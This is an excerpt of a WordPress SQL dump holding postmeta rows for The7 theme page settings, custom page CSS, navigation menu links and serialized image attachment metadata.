(2619,2150,'_dt_slideshow_photo_scroller_ls_fill_mob','fit'),
(2620,2150,'_dt_slideshow_photo_scroller_pt_max_width','100'),
(2621,2150,'_dt_slideshow_photo_scroller_pt_min_width','0'),
(2622,2150,'_dt_slideshow_photo_scroller_pt_fill_dt','fit'),
(2623,2150,'_dt_slideshow_photo_scroller_pt_fill_mob','fit'),
(2624,2150,'_dt_slideshow_revolution_slider','the7-hero-18-10-2018'),
(2625,2150,'_dt_slideshow_layer_slider','none'),
(2626,2150,'_dt_slideshow_layer_show_bg_and_paddings','0'),
(2627,2150,'_wpb_shortcodes_custom_css','.vc_custom_1480115705454{background-color: #0f1217 !important;}.vc_custom_1561541631124{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1480111988241{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1480115720857{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1480111769324{padding-bottom: 50px !important;}.vc_custom_1480112480376{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1539519331301{margin-right: -20px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480117153134{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355657702{padding-bottom: 25px !important;}.vc_custom_1480117161323{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480354986642{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355768174{padding-bottom: 25px !important;}.vc_custom_1480355177330{margin-right: -50px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 25px !important;}.vc_custom_1480117168229{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355858954{padding-bottom: 25px !important;}.vc_custom_1480355917912{margin-right: -10% !important;margin-left: -10% !important;padding-top: 45px !important;padding-bottom: 10px !important;}.vc_custom_1480117176787{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355407138{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355970532{padding-bottom: 30px !important;}.vc_custom_1480356022878{padding-bottom: 25px !important;}.vc_custom_1585210639400{padding-top: 35px !important;}.vc_custom_1480110505228{padding-bottom: 65px !important;}.vc_custom_1480368847088{padding-bottom: 70px !important;}.vc_custom_1480368872679{padding-bottom: 70px !important;}.vc_custom_1480368883967{padding-bottom: 70px !important;}.vc_custom_1480368893600{padding-bottom: 70px !important;}.vc_custom_1480368901612{padding-bottom: 70px !important;}.vc_custom_1480368911187{padding-bottom: 70px !important;}.vc_custom_1480368922883{padding-bottom: 70px !important;}.vc_custom_1480368933650{padding-bottom: 70px !important;}.vc_custom_1480368948510{padding-bottom: 70px !important;}.vc_custom_1480356038558{padding-bottom: 25px !important;}.vc_custom_1480110789588{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1479848824972{padding-bottom: 50px !important;}.vc_custom_1479848350909{padding-bottom: 50px !important;}.vc_custom_1479848750253{padding-bottom: 50px !important;}.vc_custom_1479848278606{padding-bottom: 50px !important;}.vc_custom_1479848765776{padding-bottom: 50px !important;}.vc_custom_1479848258953{padding-bottom: 50px !important;}.vc_custom_1479848812325{padding-bottom: 50px !important;}.vc_custom_1479847609345{padding-bottom: 50px !important;}.vc_custom_1479850103851{padding-bottom: 50px !important;}.vc_custom_1480356048334{padding-bottom: 25px !important;}.vc_custom_1587577448404{margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}.vc_custom_1587577444257{margin-top: 0px !important;margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}'),
(2628,2150,'_dt_microsite_page_layout','wide'),
(2629,2150,'_dt_microsite_page_loading','disabled'),
(2630,2150,'_dt_microsite_primary_menu','5'),
(2631,2150,'_dt_microsite_split_left_menu','5'),
(2632,2150,'_dt_microsite_split_right_menu','5'),
(2633,2150,'_dt_microsite_mobile_menu','5'),
(2634,2150,'_dt_microsite_logo_link','#!/up'),
(2635,2150,'_dt_microsite_favicon_type','custom'),
(2636,2150,'_dt_microsite_main_logo_type','default'),
(2637,2150,'_dt_microsite_transparent_logo_type','default'),
(2638,2150,'_dt_microsite_mixed_logo_type','default'),
(2639,2150,'_dt_microsite_floating_logo_type','default'),
(2640,2150,'_dt_microsite_mobile_logo_type','default'),
(2641,2150,'_dt_microsite_bottom_logo_type','default'),
(2642,2150,'_dt_slideshow_photo_scroller_thumbnails_width',''),
(2643,2150,'fake_id',''),
(2644,2150,'main_logo_heading',''),
(2645,2150,'_dt_microsite_main_logo_regular','a:0:{}'),
(2646,2150,'_dt_microsite_main_logo_hd','a:0:{}'),
(2647,2150,'transparent_logo_heading',''),
(2648,2150,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(2649,2150,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(2650,2150,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(2651,2150,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(2652,2150,'floating_logo_heading',''),
(2653,2150,'_dt_microsite_floating_logo_regular','a:0:{}'),
(2654,2150,'_dt_microsite_floating_logo_hd','a:0:{}'),
(2655,2150,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(2656,2150,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(2657,2150,'bottom_logo_heading',''),
(2658,2150,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(2659,2150,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(2660,2150,'favicon_heading',''),
(2661,2150,'_dt_microsite_favicon','a:0:{}'),
(2662,2150,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(2663,2150,'_dt_header_transparent_top_bar_bg_opacity','0'),
(2664,2150,'_dt_microsite_transparent_mobile_logo_type','default'),
(2665,2150,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(2666,2150,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(2667,2150,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(2668,2150,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(2669,2150,'_dt_microsite_favicon_hd','a:0:{}'),
(2670,2150,'_dt_mobile_page_padding_top','0px'),
(2671,2150,'_dt_mobile_page_padding_bottom','0px'),
(2672,2150,'the7_fancy_title_css','#main {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n@media screen and (max-width: 778px) {\n  #main {\n    padding-top: 0px;\n    padding-bottom: 0px;\n  }\n}\n'),
(2673,2150,'rs_page_bg_color','#ffffff'),
(2674,2150,'_dt_page_overrides_right_margin',''),
(2675,2150,'_dt_page_overrides_left_margin',''),
(2676,2150,'_dt_mobile_page_padding_right',''),
(2677,2150,'_dt_mobile_page_padding_left',''),
(2678,2150,'_the7_imported_item','old-landing'),
(2713,2151,'_menu_item_type','custom'),
(2714,2151,'_menu_item_menu_item_parent','0'),
(2715,2151,'_menu_item_object_id','2151'),
(2716,2151,'_menu_item_object','custom'),
(2717,2151,'_menu_item_target',''),
(2718,2151,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(2719,2151,'_menu_item_xfn',''),
(2720,2151,'_menu_item_url','https://the7.io/main/'),
(2721,2151,'_menu_item_dt_mega_menu_icon','iconfont'),
(2722,2151,'_menu_item_dt_mega_menu_iconfont','<i class=\"fa fa-fw fa-external-link-square\"></i>'),
(2723,2151,'_menu_item_the7_mega_menu_settings','a:2:{s:19:\"menu-item-icon-type\";s:4:\"html\";s:19:\"menu-item-icon-html\";s:48:\"<i class=\"fa fa-fw fa-external-link-square\"></i>\";}'),
(2724,2152,'_menu_item_type','custom'),
(2725,2152,'_menu_item_menu_item_parent','0'),
(2726,2152,'_menu_item_object_id','2152'),
(2727,2152,'_menu_item_object','custom'),
(2728,2152,'_menu_item_target',''),
(2729,2152,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(2730,2152,'_menu_item_xfn',''),
(2731,2152,'_menu_item_url','https://gsw2023.com/#!/demos'),
(2732,2152,'_menu_item_the7_mega_menu_settings','a:0:{}'),
(2733,2153,'_menu_item_type','custom'),
(2734,2153,'_menu_item_menu_item_parent','0'),
(2735,2153,'_menu_item_object_id','2153'),
(2736,2153,'_menu_item_object','custom'),
(2737,2153,'_menu_item_target',''),
(2738,2153,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(2739,2153,'_menu_item_xfn',''),
(2740,2153,'_menu_item_url','https://gsw2023.com/#!/features'),
(2741,2153,'_menu_item_the7_mega_menu_settings','a:0:{}'),
(2808,324,'_wp_attached_file','2016/11/r-1.png'),
(2809,324,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1182;s:6:\"height\";i:928;s:4:\"file\";s:15:\"2016/11/r-1.png\";s:8:\"filesize\";i:422890;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"r-1-300x236.png\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56623;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"r-1-1024x804.png\";s:5:\"width\";i:1024;s:6:\"height\";i:804;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:483498;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"r-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23026;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"r-1-768x603.png\";s:5:\"width\";i:768;s:6:\"height\";i:603;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:290483;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2810,324,'_the7_imported_item','old-landing'),
(2811,325,'_wp_attached_file','2016/11/l-1.png'),
(2812,325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:924;s:6:\"height\";i:1003;s:4:\"file\";s:15:\"2016/11/l-1.png\";s:8:\"filesize\";i:493169;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"l-1-276x300.png\";s:5:\"width\";i:276;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84461;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"l-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28953;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"l-1-768x834.png\";s:5:\"width\";i:768;s:6:\"height\";i:834;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:502794;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2813,325,'_the7_imported_item','old-landing'),
(2814,326,'_wp_attached_file','2016/11/2-l.png'),
(2815,326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:666;s:6:\"height\";i:873;s:4:\"file\";s:15:\"2016/11/2-l.png\";s:8:\"filesize\";i:179030;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"2-l-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53643;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-l-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22971;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2816,326,'_the7_imported_item','old-landing'),
(2817,327,'_wp_attached_file','2016/11/2-r.png'),
(2818,327,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:958;s:6:\"height\";i:823;s:4:\"file\";s:15:\"2016/11/2-r.png\";s:8:\"filesize\";i:277991;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"2-r-300x258.png\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62897;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-r-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"2-r-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:322884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2819,327,'_the7_imported_item','old-landing'),
(2820,329,'_wp_attached_file','2016/11/l-3.png'),
(2821,329,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1264;s:6:\"height\";i:718;s:4:\"file\";s:15:\"2016/11/l-3.png\";s:8:\"filesize\";i:337188;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"l-3-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31442;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"l-3-1024x582.png\";s:5:\"width\";i:1024;s:6:\"height\";i:582;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:255427;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"l-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12404;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"l-3-768x436.png\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:157508;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2822,329,'_the7_imported_item','old-landing'),
(2823,330,'_wp_attached_file','2016/11/3-r.png'),
(2824,330,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:907;s:6:\"height\";i:420;s:4:\"file\";s:15:\"2016/11/3-r.png\";s:8:\"filesize\";i:234403;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"3-r-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32542;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"3-r-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10657;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"3-r-768x356.png\";s:5:\"width\";i:768;s:6:\"height\";i:356;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:164589;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2825,330,'_the7_imported_item','old-landing'),
(2826,334,'_wp_attached_file','2016/11/slider-logo-img.png'),
(2827,334,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:234;s:6:\"height\";i:234;s:4:\"file\";s:27:\"2016/11/slider-logo-img.png\";s:8:\"filesize\";i:4994;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"slider-logo-img-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8668;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2828,334,'_the7_imported_item','old-landing'),
(2829,337,'_wp_attached_file','2016/11/addons-hero.png'),
(2830,337,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:105;s:6:\"height\";i:105;s:4:\"file\";s:23:\"2016/11/addons-hero.png\";s:8:\"filesize\";i:5306;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2831,337,'_the7_imported_item','old-landing'),
(2832,338,'_wp_attached_file','2016/11/vc-hero.png'),
(2833,338,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:87;s:6:\"height\";i:87;s:4:\"file\";s:19:\"2016/11/vc-hero.png\";s:8:\"filesize\";i:7562;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2834,338,'_the7_imported_item','old-landing'),
(2835,341,'_wp_attached_file','2016/11/art-m.png'),
(2836,341,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:350;s:4:\"file\";s:17:\"2016/11/art-m.png\";s:8:\"filesize\";i:389504;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"art-m-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47415;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"art-m-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32910;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"art-m-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:237107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2837,341,'_the7_imported_item','old-landing'),
(2838,380,'_wp_attached_file','2016/11/a-1.jpg'),
(2839,380,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:487;s:4:\"file\";s:15:\"2016/11/a-1.jpg\";s:8:\"filesize\";i:96271;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"a-1-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"a-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6619;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"a-1-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40942;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2840,380,'_the7_imported_item','old-landing'),
(2841,381,'_wp_attached_file','2016/11/a-3.jpg'),
(2842,381,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:570;s:4:\"file\";s:15:\"2016/11/a-3.jpg\";s:8:\"filesize\";i:120537;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"a-3-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12782;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"a-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6569;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"a-3-768x561.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51579;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2843,381,'_the7_imported_item','old-landing'),
(2844,411,'_wp_attached_file','2016/11/bg-blur.jpg'),
(2845,411,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1700;s:6:\"height\";i:1000;s:4:\"file\";s:19:\"2016/11/bg-blur.jpg\";s:8:\"filesize\";i:22339;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"bg-blur-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2135;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"bg-blur-1024x602.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13057;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"bg-blur-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1414;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"bg-blur-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7941;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"bg-blur-1536x904.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:904;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2846,411,'_the7_imported_item','old-landing'),
(2847,413,'_wp_attached_file','2016/11/a-002.png'),
(2848,413,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:474;s:4:\"file\";s:17:\"2016/11/a-002.png\";s:8:\"filesize\";i:118871;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"a-002-300x182.png\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38754;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"a-002-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22685;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"a-002-768x467.png\";s:5:\"width\";i:768;s:6:\"height\";i:467;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:201200;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2849,413,'_the7_imported_item','old-landing'),
(2850,416,'_wp_attached_file','2016/11/art-4.png'),
(2851,416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:557;s:4:\"file\";s:17:\"2016/11/art-4.png\";s:8:\"filesize\";i:382653;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"art-4-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81736;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"art-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36895;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"art-4-768x548.png\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:427922;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
